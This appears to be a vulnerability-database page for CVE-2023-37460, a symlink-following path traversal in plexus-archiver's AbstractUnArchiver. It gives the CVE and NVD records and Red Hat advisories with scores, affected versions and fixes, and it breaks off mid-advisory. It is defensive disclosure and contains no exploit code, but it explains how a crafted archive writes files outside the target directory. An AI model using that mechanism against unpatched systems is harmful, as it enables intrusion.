Action not permitted
Modal body text goes here.
Modal Title
Modal Body
cve-2023-37460
Vulnerability from cvelistv5
Published
2023-07-25 19:41
Modified
2024-10-03 19:09
Severity ?
EPSS score ?
Summary
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| ▼ | codehaus-plexus | plexus-archiver |
Version: < 4.8.0 |
|
|
|||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:29.488Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "plexus-archiver",
"vendor": "codehaus-plexus",
"versions": [
{
"lessThan": "4.8.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-37460",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-03T19:09:14.939906Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-03T19:09:55.667Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "plexus-archiver",
"vendor": "codehaus-plexus",
"versions": [
{
"status": "affected",
"version": "\u003c 4.8.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-61",
"description": "CWE-61: UNIX Symbolic Link (Symlink) Following",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-25T19:41:46.096Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"source": {
"advisory": "GHSA-wh3p-fphp-9h2m",
"discovery": "UNKNOWN"
},
"title": "Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37460",
"datePublished": "2023-07-25T19:41:46.096Z",
"dateReserved": "2023-07-06T13:01:36.997Z",
"dateUpdated": "2024-10-03T19:09:55.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.8.0\", \"matchCriteriaId\": \"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}]",
"id": "CVE-2023-37460",
"lastModified": "2024-11-21T08:11:45.130",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.1, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.2, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
"published": "2023-07-25T20:15:13.703",
"references": "[{\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}, {\"lang\": \"en\", \"value\": \"CWE-61\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-37460\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-07-25T20:15:13.703\",\"lastModified\":\"2024-11-21T08:11:45.130\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-61\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.8.0\",\"matchCriteriaId\":\"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}],\"references\":[{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
}
}
rhsa-2023_6138
Vulnerability from csaf_redhat
Published
2023-10-26 10:05
Modified
2024-12-17 23:05
Summary
Red Hat Security Advisory: Migration Toolkit for Runtimes security update
Notes
Topic
An update is now available for Migration Toolkit for Runtimes.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Migration Toolkit for Runtimes.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Security Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6138",
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes\u0026downloadType=distributions"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "WINDUPRULE-1038",
"url": "https://issues.redhat.com/browse/WINDUPRULE-1038"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6138.json"
}
],
"title": "Red Hat Security Advisory: Migration Toolkit for Runtimes security update",
"tracking": {
"current_release_date": "2024-12-17T23:05:47+00:00",
"generator": {
"date": "2024-12-17T23:05:47+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2023:6138",
"initial_release_date": "2023-10-26T10:05:45+00:00",
"revision_history": [
{
"date": "2023-10-26T10:05:45+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-10-26T10:05:45+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T23:05:47+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product": {
"name": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_id": "Migration Toolkit for Runtimes 1 on RHEL 8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:migration_toolkit_runtimes:1.0::el8"
}
}
}
],
"category": "product_family",
"name": "Migration Toolkit for Runtimes"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2023-10-05T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2242288"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Plexus Archiver. While using AbstractUnArchiver for extracting, an archive might lead to arbitrary file creation and possible remote code execution (RCE). Extracting an archive with an entry in the destination directory as a symbolic link whose target does not exist will bypass the directory destination verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "There are factors beyond the attacker\u0027s control. For example, the victim\u0027s server must have an incomplete SSH server configuration by not having the \"~/.ssh/authorized_keys\" existent and also having an SSH Server Port externally accessible. So, an attacker would need, even in other scenarios, to gather configuration settings and previous knowledge about the environment in order to have a successful attack. The impact is Important as code execution might happen, but it is not guaranteed.\n\nRed Hat Fuse 7 contains plexus-archiver as a transitive dependency and does not make it vulnerable during runtime, hence the low impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "RHBZ#2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-37460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37460"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"category": "external",
"summary": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"category": "external",
"summary": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/",
"url": "https://research.jfrog.com/vulnerabilities/plexus-archiver-arbitrary-file-overwrite-xray-526292/"
}
],
"release_date": "2023-07-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-10-26T10:05:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:6138"
},
{
"category": "workaround",
"details": "No mitigations are available for this issue.",
"product_ids": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Migration Toolkit for Runtimes 1 on RHEL 8"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "plexus-archiver: Arbitrary File Creation in AbstractUnArchiver"
}
]
}
rhsa-2023:6886
Vulnerability from csaf_redhat
Published
2023-11-13 09:42
Modified
2025-01-06 05:00
Summary
Red Hat Security Advisory: plexus-archiver security update
Notes
Topic
An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.
Security Fix(es):
* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for plexus-archiver is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Plexus project provides a full software stack for creating and executing software projects. Based on the Plexus container, the applications can utilise component-oriented programming to build modular, reusable components that can easily be assembled and reused. The plexus-archiver component provides functions to create and extract archives.\n\nSecurity Fix(es):\n\n* plexus-archiver: Arbitrary File Creation in AbstractUnArchiver (CVE-2023-37460)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2023:6886",
"url": "https://access.redhat.com/errata/RHSA-2023:6886"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2242288",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242288"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_6886.json"
}
],
"title": "Red Hat Security Advisory: plexus-archiver security update",
"tracking": {
"current_release_date": "2025-01-06T05:00:10+00:00",
"generator": {
"date": "2025-01-06T05:00:10+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.5"
}
},
"id": "RHSA-2023:6886",
"initial_release_date": "2023-11-13T09:42:49+00:00",
"revision_history": [
{
"date": "2023-11-13T09:42:49+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-11-13T09:42:49+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-01-06T05:00:10+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::client"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux ComputeNode Optional (v. 7)",
"product_id": "7ComputeNode-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::computenode"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Server Optional (v. 7)",
"product_id": "7Server-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::server"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product": {
"name": "Red Hat Enterprise Linux Workstation Optional (v. 7)",
"product_id": "7Workstation-optional-7.9.Z",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:7::workstation"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver@2.4.2-6.el7_9?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_id": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/plexus-archiver-javadoc@2.4.2-6.el7_9?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-0:2.4.2-6.el7_9.src as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-0:2.4.2-6.el7_9.src"
},
"product_reference": "plexus-archiver-0:2.4.2-6.el7_9.src",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch as a component of Red Hat Enterprise Linux Client Optional (v. 7)",
"product_id": "7Client-optional-7.9.Z:plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch"
},
"product_reference": "plexus-archiver-javadoc-0:2.4.2-6.el7_9.noarch",
"relates_to_product_reference": "7Client-optional-7.9.Z"
},
